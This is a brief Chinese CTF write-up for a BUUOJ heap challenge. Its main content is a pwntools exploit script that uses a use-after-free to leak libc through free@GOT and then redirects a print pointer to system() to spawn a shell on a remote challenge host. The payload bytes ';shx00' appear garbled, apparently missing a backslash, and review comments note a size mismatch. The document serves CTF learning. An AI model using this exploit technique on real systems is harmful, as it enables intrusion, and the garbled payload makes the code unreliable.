查看保护
通过uaf改content指针为got,泄露出libc,接着改puts指针为system,放入;/shx00即可。
pwnable专题
from pwn import *
context(arch='i386', os='linux', log_level='debug')
# Path of the challenge binary, relative to the script's working directory.
file_name = './z1r0'
debug = 1
# NOTE(review): despite its name, a truthy `debug` talks to the remote service
# while a falsy one spawns the local binary — confirm that mapping is intended.
r = remote('node4.buuoj.cn', 27791) if debug else process(file_name)
# Parsed binary; later code reads its GOT entries from this object.
elf = ELF(file_name)
def dbg() -> None:
    """Attach gdb to the live target `r`; interactive side effect only."""
    attach = gdb.attach
    attach(r)
# Prompt string the helper functions wait for before sending a menu choice.
menu = 'Your choice :'
def add(size: int, content: str | bytes) -> None:
    """Drive menu option 1: create a note of `size` bytes holding `content`.

    The choice and the size are answered with a trailing newline; `content`
    is sent as-is (sendafter, not sendlineafter), so no newline is appended.
    """
    prompts = ((menu, '1'), ('Note size :', str(size)))
    for prompt, answer in prompts:
        r.sendlineafter(prompt, answer)
    r.sendafter('Content :', content)
def delete(index: int) -> None:
    """Drive menu option 2: free the note stored at `index`."""
    prompts = ((menu, '2'), ('Index :', str(index)))
    for prompt, answer in prompts:
        r.sendlineafter(prompt, answer)
def show(index: int) -> None:
    """Drive menu option 3: ask the target to print the note at `index`."""
    prompts = ((menu, '3'), ('Index :', str(index)))
    for prompt, answer in prompts:
        r.sendlineafter(prompt, answer)
# Three notes of equal size, then free index 1 and index 0. The order of these
# calls is the exploit's heap layout; do not reorder them.
add(0x10, 'aaaa') #0
add(0x10, 'bbbb') #1
add(0x10, 'cccc') #2
delete(1)
delete(0)
# Address of free@GOT in the target binary; 4 bytes from it are read back below.
free_got = elf.got['free']
# Fixed address inside the binary; the page does not say what it points to —
# TODO confirm against the disassembly before reusing this script.
addr = 0x804862b
# New note whose 8-byte content is the pair (addr, free_got). show(1) is then
# called on a note that was freed above; per the write-up this is the
# use-after-free: presumably the new content now sits where note 1's data was,
# so printing note 1 prints through that pointer pair — verify with the binary.
add(8, p32(addr) + p32(free_got)) #3
show(1)
# First 4 bytes of the output are taken as the runtime address of free().
free_addr = u32(r.recv(4))
# Symbol offsets come from the challenge-provided libc (path relative to the script);
# the leak must come from the same libc build or the arithmetic below is wrong.
libc = ELF('./2.23/libc-2.23.so')
libc_base = free_addr - libc.sym['free']
system_addr = libc_base + libc.sym['system']
# Free the pointer-pair note so its slot is reused by the next add().
delete(3)
# Second payload: packed system address followed by the trailing bytes exactly
# as written on this page. Note the 10-byte payload is larger than the requested
# size of 8 passed to add() below — TODO confirm how the target bounds the read.
p1 = p32(system_addr) + b';shx00'
add(8, p1)
# Printing note 1 again now dispatches through the overwritten pointer.
show(1)
# Hand the connection to the user.
r.interactive()



